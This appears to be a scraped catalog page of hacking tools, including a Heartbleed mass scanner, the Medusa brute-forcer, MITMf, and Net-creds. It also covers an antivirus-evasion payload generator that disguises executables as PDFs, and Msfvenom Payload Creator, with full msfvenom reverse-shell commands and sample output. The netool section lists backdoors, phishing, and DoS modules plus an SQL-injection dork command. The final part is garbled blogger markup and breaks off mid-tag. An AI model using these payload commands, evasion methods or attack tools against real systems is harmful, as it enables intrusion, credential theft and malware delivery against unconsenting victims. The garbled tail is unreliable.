This script has four main functions with the ability to proxy all connections:
  1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
  2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
  3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
  4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)

PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.

PROXY USAGE EXAMPLES: (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy) (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy) (example: sh massbleed.sh 127.0.0.1 single 0 proxy) (example: sh massbleed.sh 192.168.0. subnet 0 proxy)

VULNERABILITIES:
  1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
  2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
  3. Poodle SSLv3 vulnerability (CVE-2014-3566)

Download MassBleed

Medusa - Speedy, Parallel and Modular Login Brute-Forcer


Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:
  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Why?

Why create Medusa? Isn't this the same thing as THC-Hydra? Here are some of the reasons for this application:
  • Application stability. Maybe I'm just lame, but Hydra frequently crashed on me. I was no longer confident that Hydra was actually doing what it claimed to be. Rather than fix Hydra, I decided to create my own buggy application which could crash in new and exciting ways.
  • Code organization. A while back I added several features to Hydra (parallel host scanning, SMBNT module). Retro-fitting the parallel host code to Hydra was a serious pain. This was mainly due to my coding ignorance, but was probably also due to Hydra not being designed from the ground-up to support this. Medusa was designed from the start to support parallel testing of hosts, users and passwords.
  • Speed. Hydra accomplishes its parallel testing by forking off a new process for each host and instance of the service being tested. When testing many hosts/users at once this creates a large amount of overhead as user/password lists must be duplicated for each forked process. Medusa is pthread-based and does not unnecessarily duplicate information.
  • Education. I am not an experienced C programmer, nor do I consider myself an expert in multi-threaded programming. Writing this application was a training exercise for me. Hopefully, the results of it will be useful for others. 

Module specific details:
  •     AFP
  •     CVS
  •     FTP
  •     HTTP
  •     IMAP
  •     MS-SQL
  •     MySQL
  •     NetWare NCP
  •     NNTP
  •     PcAnywhere
  •     POP3
  •     PostgreSQL
  •     REXEC
  •     RDP
  •     RLOGIN
  •     RSH
  •     SMBNT
  •     SMTP-AUTH
  •     SMTP-VRFY
  •     SNMP
  •     SSHv2
  •     Subversion (SVN)
  •     Telnet
  •     VMware Authentication Daemon (vmauthd)
  •     VNC
  •     Generic Wrapper
  •     Web Form 

News
2015-06-07: Released Medusa v2.2_rc2
2015-05-28: Released Medusa v2.2_rc1
2012-05-25: Released Medusa v2.1.1
2012-04-02: Released Medusa v2.1
2011-03-04: tak and bigmoneyhat have released a Java-based GUI for Medusa (Medusa-gui)
2010-02-09: Released Medusa v2.0


Download Medusa

Metasploit AV Evasion - Metasploit payload generator that avoids most Anti-Virus products


Metasploit payload generator that avoids most Anti-Virus products.

Installing
git clone https://github.com/nccgroup/metasploitavevasion.git
chmod +x the avoid.sh file before use.

How To Use
./avoid.sh
Then follow the on screen prompts.

Features
  • Easily generate a Metasploit executable payload to bypass Anti-Virus detection
  • Local or remote listener generation
  • Disguises the executable file with a PDF icon
  • Executable opens minimised on the victims computer
  • Automatically creates AutoRun files for CDROM exploitation

Download Metasploit AV Evasion

MicEnum - Mandatory Integrity Control Enumerator for Windows



In the context of the Microsoft Windows family of operating systems, Mandatory Integrity Control (MIC) is a core security feature introduced in Windows Vista and implemented in subsequent lines of Windows operating systems. It adds Integrity Levels(IL)-based isolation to running processes and objects. The IL represents the level of trustworthiness of an object, and it may be set to files, folders, etc. Believe it or not, there is no graphical interface for dealing with MIC in Windows. MicEnum has been created to solve this, and as a tool for forensics.

MicEnum is a simple graphical tool that:
  • Enumerates the Integrity Levels of the objects (files and folders) in the hard disks.
  • Enumerates the Integrity Levels in the registry.
  • Helps to detect anomalies in them by spotting different integrity levels.
  • Allows to store and restore this information in an XML file so it may be used for forensic purposes.
  • Allows to set or modify the integrity levels graphically.

MicEnum scanning a folder

How does the tool work?

The only way by now, to show or set Integrity Levels in Windows is by using icacls.exe, a command line tool. There is no easy or standard way to detect changes or anomalies. As in NTFS, an attacker may have changed Integrity Levels of a file in a system to elevate privileges or leverage another attack, so, watching this kind of movements and anomalies is important for forensics or preventive actions.

The tool represents files and folders in a tree style. The integrity level of files and folders is shown in a column next to them. By scanning a folder, the tool will check all Integrity Levels and, if any of them does not match with its parent, it will expand it. If you have expanded some folders and want to group back the ones that are known to be the same, just use the checkbox at the bottom. It will hide the folders that are supposed to share same integrity level.

MicEnum scanning a Windows registry branch

For setting new integrity levels, just use the contextual menu again and set the desired level. Do not change them if you do not know what you are doing. You may need administrator privileges to achieve the change.

The program allows to set different integrity levels

For forensic purposes, the whole "session" or information about the integrity levels may be saved as an XML file. Later you may restore it with this same tool. Once restored, icons are missing, and there is no chance to set new values, of course, since you are not using your "live" hard disk.

If a session is loaded, the different values are shown

This all applies to registry branches as well, in its correspondent tab.

MicEnum is inspired in AccessEnum, a classical tool by Sysinternals that enumerates NTFS permissions and helps detecting anomalies.



MITMf - Framework for Man-In-The-Middle attacks


Framework for Man-In-The-Middle attacks

Available plugins
  • SMBtrap - Exploits the 'SMB Trap' vulnerability on connected clients
  • Screenshotter - Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ - Partially bypass HSTS
  • Spoof - Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
  • BeEFAutorun - Autoruns BeEF modules based on a client's OS or browser type
  • AppCachePoison - Perform app cache poisoning attacks
  • Ferret-NG - Transperently hijacks sessions
  • BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
  • CacheKill - Kills page caching by modifying headers
  • FilePwn - Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject - Inject arbitrary content into HTML content
  • BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
  • jskeylogger - Injects a Javascript keylogger into a client's webpages
  • Replace - Replace arbitary content in HTML content
  • SMBAuth - Evoke SMB challenge-response authentication attempts
  • Upsidedownternet - Flips images 180 degrees

How to install on Kali
apt-get install mitmf


Installation
If MITMf is not in your distro's repo or you just want the latest version:
  • Run the command git clone https://github.com/byt3bl33d3r/MITMf.git to clone this directory
  • Run the setup.sh script
  • Run the command pip install --upgrade -r requirements.txt to install all Python dependencies

On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ImportError: no module named pcap, run apt-get install python-pypcap to fix it


Download MITMf

MobaXterm - Terminal for Windows with X11 server, tabbed SSH client, network tools and much more...


MobaXterm is your ultimate toolbox for remote computing. In a single Windows application, it provides loads of functions that are tailored for programmers, webmasters, IT administrators and pretty much all users who need to handle their remote jobs in a more simple fashion.

MobaXterm provides all the important remote network tools (SSH, X11, RDP, VNC, FTP, MOSH, ...) and Unix commands (bash, ls, cat, sed, grep, awk, rsync, ...) to Windows desktop, in a single portable exe file which works out of the box.

There are many advantages of having an All-In-One network application for your remote tasks, e.g. when you use SSH to connect to a remote server, a graphical SFTP browser will automatically pop up in order to directly edit your remote files. Your remote applications will also display seamlessly on your Windows desktop using the embedded X server.

You can download and use MobaXterm Home Edition for free. If you want to use it inside your company, you should consider subscribing to MobaXterm Professional Edition: this will give you access to much more features, professional support and "Customizer" software.

When developing MobaXterm, we focused on a simple aim: proposing an intuitive user interface in order for you to efficiently access remote servers through different networks or systems.

Key features

Embedded X serverFully configured Xserver based on X.org
Easy DISPLAY exportation DISPLAY is exported from remote Unix to local Windows
X11-Forwarding capability Your remote display uses SSH for secure transport
Tabbed terminal with SSH Based on PuTTY/MinTTY with antialiased fonts and macro support
Many Unix/Linux commands on Windows Includes basic Cygwin commands (bash, grep, awk, sed, rsync,...)
Add-ons and plugins You can extend MobaXterm capabilities with plugins
Versatile session manager All your network tools in one app: Rdp, Vnc, Ssh, Mosh, X11, ...
Portable and light application MobaXterm has been packaged as a single executable which does not require admin rights and which you can start from an USB stick
Professional application MobaXterm Professional has been designed for security and stability for very challenging people

MobaXterm plugins

Corkscrew: Corkscrew allows to tunnel TCP connections through HTTP proxies
Curl: Curl is a command line tool for transferring data with URL syntax
CvsClient: A command line tool to access CVS repositories
Gcc, G++ and development tools: the GNU C/C++ compiler and other development tools
DnsUtils: This plugin includes some useful utilities for host name resolution:
dig, host, nslookup and nsupdate.
E2fsProgs: Utilities for creating, fixing, configuring, and debugging ext2/3/4 filesystems.
Emacs: The extensible, customizable, self-documenting real-time display editor
Exif: Command-line utility to show EXIF information hidden in JPEG files.
FVWM2: A light but powerful window manager for X11.
File: Determines file type using magic numbers.
Fontforge: A complete font editor with many features
GFortran: The GNU Fortran compiler.
Git: A fast and powerful version control system.
Gvim: The Vim editor with a GTK interface
Httperf: A tool for measuring web server performance.
Joe: Fast and simple editor which emulates 5 other editors.
Lftp: Sophisticated file transfer program and ftp/http/bittorrent client.
Lrzsz: Unix communication package providing the XMODEM, YMODEM ZMODEM file transfer protocols.
Lynx: A text-mode web browser.
MPlayer: The ultimate video player
Midnight Commander: Midnight Commander is a feature rich text mode visual file manager.
Mosh: MOSH has been included into MobaXterm main executable in version 7.1 directly in the sessions manager. This plugin is deprecated.
Multitail: Program for monitoring multiple log files, in the fashion of the original tail program.
NEdit: NEdit is a multi-purpose text editor for the X Window System.
Node.js: Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. This plugin does not include NPM.
OpenSSL: A toolkit implementing SSL v2/v3 and TLS protocols.
PdKsh: A KSH shell open-source implementation.
Perl: Larry Wall's Practical Extracting and Report Language
Png2Ico: Png2Ico Converts PNG files to Windows icon resource files.
Python: An interpreted, interactive object-oriented programming language.
Ruby: Interpreted object-oriented scripting language.
Screen: Screen is a terminal multiplexer and window manager that runs many separate 'screens' on a single physical character-based terminal.
Sqlite3: Software library that implements a self-contained, serverless, zero-configuration, transactional SQL database engine.
SquashFS: mksquashfs and unsquashfs tools allow you to create/unpack squashfs filesystems from Windows.
Subversion (SVN): Subversion is a powerful version control system.
Tcl / Tk / Expect: Tcl is a simple-to-learn yet very powerful language. Tk is its graphical toolkit. Expect is an automation tool for terminal.
X11Fonts: Complete set of fonts for X11 server.
X3270Suite: IBM 3270 terminal emulator for Windows.
XServers: Xephyr, Xnest, Xdmx, Xvfb and Xfake alternate X11 servers.
Xmllint: A command line XML tool.
Xorg (legacy): The old X11 (Xorg v1.6.5) server: use this plugin if you have trouble connecting to an old Unix station through XDMCP.
Zip: Zip compression utility.


Download MobaXterm

MobSF (Mobile Security Framework) - Mobile (Android/iOS) Automated Pen-Testing Framework


Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test and this process requires a lot of effort and time. Mobile Security Framework can be used for effective and fast security analysis of Android and iOS Applications. It supports binaries (APK & IPA) and zipped source code.

The static analyzer is able to perform automated code review, detect insecure permissions and configurations, and detect insecure code like ssl overriding, ssl bypass, weak crypto, obfuscated codes, improper permissions, hardcoded secrets, improper usage of dangerous APIs, leakage of sensitive/PII information, and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects the issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error or crash reports, debug information, stack trace, and on the application assets like setting files, preferences, and databases. This framework is highly scalable that you can add your custom rules with ease. A quick and clean report can be generated at the end of the tests. We will be extending this framework to support other mobile platforms like Tizen, WindowsPhone etc. in future.

Documentation

Queries

Screenshots and Sample Report

Static Analysis - Android APK




Static Analysis - iOS IPA



Sample Report: http://opensecurity.in/research/security-analysis-of-android-browsers.html

v0.8.8 Changelog
  • New name: Mobile Security Framework (MobSF)
  • Added Dynamic Analysis
  • VM Available for Download
  • Fixed RCE
  • Fixed Broken Manifest File Parsing Logic
  • Sqlite DB Support
  • Fixed Reporting with new PDF report
  • Rescan Option
  • Detect Root Detection
  • Added Requiremnts.txt
  • Automated Java Path Detection
  • Improved Manifest and Code Analysis
  • Fixed Unzipping error for Unix.
  • Activity Tester Module
  • Exported Activity Tester Module
  • Device API Hooker with DroidMon
  • SSL Certificate Pinning Bypass with JustTrustMe
  • RootCloak to prevent root Detection
  • Data Pusher to Dump Application Data
  • pyWebproxy to decrypt SSL Traffic

v0.8.7 Changelog
  • Improved Static Analysis Rules
  • Better AndroidManifest View
  • Search in Files

v0.8.6 Changelog
  • Detects implicitly exported component from manifest.
  • Added CFR decompiler support
  • Fixed Regex DoS on URL Regex

v0.8.5 Changelog
  • Bug Fix to support IPA MIME Type: application/x-itunes-ipa

v0.8.4 Changelog
  • Improved Android Static Code Analysis speed (2X performance)
  • Static Code analysis on Dexguard protected APK.
  • Fixed a Security Issue - Email Regex DoS.
  • Added Logging Code.
  • All Browser Support.
  • MIME Type Bug fix to Support IE.
  • Fixed Progress Bar.

v0.8.3 Changelog
  • View AndroidManifest.xml & Info.plist
  • Supports iOS Binary (IPA)
  • Bug Fix for Linux (Ubuntu), missing MIME Type Detection
  • Check for Hardcoded Certificates
  • Added Code to prevent from Directory Traversal

Credits
  • Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
  • Thomas Abraham - For JS Hacks on UI.
  • Anto Joseph (@antojosep007) - For the help with SuperSU.
  • Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
  • Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs and feature requests.
  • Anant Srivastava (@anantshri) - For Activity Tester Idea


Download Mobile-Security-Framework-Mobsf

Mosca - Static Analysis Tool To Find Bugs



Just another Simple static analysis tool to find bugs like a grep unix command, at mosca have a modules, that was call egg, each egg is a simple config to find bug at especific language like PHP,Ruby,ASP etc... Example of egg config at directory "egg", If Mosca read a line with vunerability of egg in source code, then, mosca have alert about vulnerability and save at logs.


Download Mosca

MPC - Msfvenom Payload Creator


Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
  • Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
  • Don't know what your external IP is? MPC will discover it: wan.
  • Want to generate one of each payload? No issue! Try: loop.
  • Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will not try to bypass any anti-virus solutions.

Install
  • Designed for Kali Linux v1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Help
root@kali:~# mpc -h -v
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
 [i]   Example: /usr/bin/mpc windows 192.168.1.10        # Windows & manual IP.
 [i]            /usr/bin/mpc elf eth0 4444               # Linux, eth0's IP & manual port.
 [i]            /usr/bin/mpc stageless cmd py verbose    # Python, stageless command prompt.
 [i]            /usr/bin/mpc loop eth1                   # A payload for every type, using eth1's IP.
 [i]            /usr/bin/mpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
 [i]            /usr/bin/mpc help verbose                # This help screen, with even more information.

 [i] <TYPE>:
 [i]   + ASP
 [i]   + ASPX
 [i]   + Bash [.sh]
 [i]   + Java [.jsp]
 [i]   + Linux [.elf]
 [i]   + OSX [.macho]
 [i]   + Perl [.pl]
 [i]   + PHP
 [i]   + Powershell [.ps1]
 [i]   + Python [.py]
 [i]   + Tomcat [.war]
 [i]   + Windows [.exe]

 [i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
 [i] Missing <DOMAIN/IP> will default to the IP menu.

 [i] Missing <PORT> will default to 443.

 [i] <CMD> is a standard/native command prompt/terminal to interactive with.
 [i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
 [i] Missing <CMD/MSF> will default to <MSF> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
 [i] <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
 [i] <MSF> payloads are generally much larger than <CMD>, as it comes with more features.

 [i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
 [i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 [i] Missing <BIND/REVERSE> will default to <REVERSE>.
 [i] <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

 [i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
 [i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 [i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
 [i] <STAGED> are 'better' in low-bandwidth/high-latency environments.
 [i] <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payloads/

 [i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
 [i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
 [i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
 [i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 [i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 [i] By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

 [i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
 [i] <LOOP> will just create one of each <TYPE>.

 [i] <VERBOSE> will display more information.
root@kali:~#

Example #1 (Windows, Fully Automated With IP)
root@kali:~# mpc windows 192.168.1.10
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe
 [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'   (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #2 (Linux Format, Fully Automated With Interface and Port)
root@kali:~# ./mpc elf eth0 4444
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.103.238
 [i] PORT: 4444
 [i] TYPE: linux (linux/x86/shell/reverse_tcp)
 [i]  CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
 [i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
 [i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc'   (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)
root@kali:~# mpc stageless cmd py verbose
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] Use which interface/IP address?:
 [i]   1.) eth0 - 192.168.103.238
 [i]   2.) eth1 - 192.168.155.175
 [i]   3.) tap0 - 10.10.100.63
 [i]   4.) lo - 127.0.0.1
 [i]   5.) wan - xx.xx.xx.xx
 [?] Select 1-5, interface or IP address: 3

 [i]        IP: 10.10.100.63
 [i]      PORT: 443
 [i]      TYPE: python (python/shell_reverse_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: reverse
 [i]     STAGE: stageless
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py
 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
 [i] File: ASCII text, with very long lines, with no line terminators
 [i] Size: 4.0K
 [i]  MD5: 53452eafafe21bff94e6c4621525165b
 [i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9
 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'   (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

To-Do List
  • Shellcode generation
  • x64 payloads
  • IPv6 support
  • Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)


Download Msfvenom Payload Creator

MySQL Query Browser Password Dump - Command-line Tool to Recover Lost or Forgotten Passwords from MySQL Query Browser


MySQL Query Browser Password Dump is the free command-line tool to instantly recover your lost or forgotten passwords from MySQL Query Browser software.

MySQL Query Browser is a simple software to manage your MySQL database connections and queries. By default, it stores all the database login details so that user don't have enter it everytime.

Our tool helps you to quickly find and decode all the login username & password details for each database. For each of the recovered MySQL database connection, it displays following details,
  • Login Username
  • Login Password
  • Database Schema
  • MySQL Port
  • MySQL Host/Server Address

It operates in both automatic and manual mode. You can ask it to auto detect password file from default location of MySQL Query Browser or manually provide one. This way, you can not only recover database passwords from local system but also from a file copied from remote system easily.

Being command-line tool makes it ideal tool for penetration testers and forensic investigators. It is fully portable and also includes installer to help you in local installation & un-installation.

MySQL Query Browser Password Dumpp works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.


Download MySQL Query Browser Password Dump

Net-creds - Sniff passwords and hashes from an interface or pcap file



Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.

Sniffs
  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
  • Kerberos

Examples

Auto-detect the interface to sniff
sudo python net-creds.py
Choose eth0 as the interface
sudo python net-creds.py -i eth0
Ignore packets to and from 192.168.0.2
sudo python net-creds.py -f 192.168.0.2
Read from pcap
python net-creds.py -p pcapfile


Download Net-creds

netool.sh - MitM Pentesting Opensource T00lkit


netool.sh toolkit provides a fast and easy way For new arrivals to IT security pentesting and also to experience users to use allmost all features that the Man-In-The-Middle can provide under local lan, since scanning, sniffing and social engeneering attacks "[spear phishing attacks]"...

DESCRIPTION
"Scanning - Sniffing - Social Engeneering"

Netool: its a toolkit written using 'bash, python, ruby' that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet) also uses macchanger to decoy scans changing the mac address.

Rootsector: module allows you to automate some attacks over DNS_SPOOF + MitM (phishing - social engineering) using metasploit, apache2 and ettercap frameworks. like the generation of payloads,shellcode,backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage.

Recently was introduced "inurlbr" webscanner (by cleiton) that allow us to search SQL related bugs, using severeal search engines, also this framework can be used in conjunction with other frameworks like nmap, (using the flag --comand-vul) 

Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27 -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported

Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS Linux-backtrack (un-continued) | Mac osx (un-continued).

Dependencies

"TOOLKIT DEPENDENCIES"
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

"SCANNER INURLBR.php"
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

* Install zenity | Install nmap | Install ettercap | Install macchanger | Install metasploit | Install Apache2 *

Features (modules)
  "1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network 
        Scan external lan for hosts
        Scan a list of targets (list.txt)          
        Scan remote host for vulns          
        Execute Nmap command
        Search for target geolocation
        ping of dead (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
        <- data-blogger-escaped--="" data-blogger-escaped-addon="" data-blogger-escaped-config="" data-blogger-escaped-etrieve="" data-blogger-escaped-firefox="" data-blogger-escaped-metadata="" data-blogger-escaped-p="" data-blogger-escaped-pen="" data-blogger-escaped-router="" data-blogger-escaped-tracer="" data-blogger-escaped-webcrawler="" data-blogger-escaped-whois="">
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
        <- data-blogger-escaped--="" data-blogger-escaped-php="" data-blogger-escaped-webcrawler=""> 
        scanner inurlbr.php -> Advanced search with multiple engines, provided
        analysis enables to exploit GET/POST capturing emails/urls & internal
        custom validation for each target/url found. also the ability to use
        external frameworks in conjuction with the scanner like nmap,sqlmap,etc
        or simple the use of external scripts.
        <- data-blogger-escaped--="" data-blogger-escaped-automated="" data-blogger-escaped-engeneering="" data-blogger-escaped-exploits="" data-blogger-escaped-phishing="" data-blogger-escaped-r00tsect0r="" data-blogger-escaped-social="">
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylooger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [Dos attack against target RDP]
        website D0S flood [Dos attack using syn packets]
        firefox_xpi_bootstarpped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embedded a payload into a world document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a lisenner [multi-handler]
        <- data-blogger-escaped-a.="" data-blogger-escaped-about="" data-blogger-escaped-access="" data-blogger-escaped-attack="" data-blogger-escaped-aunch="" data-blogger-escaped-c.="" data-blogger-escaped-check="" data-blogger-escaped-code="" data-blogger-escaped-config="" data-blogger-escaped-cupp.py="" data-blogger-escaped-d.="" data-blogger-escaped-database="" data-blogger-escaped-db.="" data-blogger-escaped-delete="" data-blogger-escaped-etter.filters="" data-blogger-escaped-ettercap="" data-blogger-escaped-execute="" data-blogger-escaped-files="" data-blogger-escaped-filter="" data-blogger-escaped-folders="" data-blogger-escaped-for="" data-blogger-escaped-hare="" data-blogger-escaped-how="" data-blogger-escaped-lan="" data-blogger-escaped-local="" data-blogger-escaped-lock="" data-blogger-escaped-mitm="" data-blogger-escaped-netool="" data-blogger-escaped-niff="" data-blogger-escaped-ns-spoofing="" data-blogger-escaped-ommon="" data-blogger-escaped-ompile="" data-blogger-escaped-on="" data-blogger-escaped-onfig="" data-blogger-escaped-os="" data-blogger-escaped-password="" data-blogger-escaped-passwords="" data-blogger-escaped-pics="" data-blogger-escaped-profiler="" data-blogger-escaped-q.="" 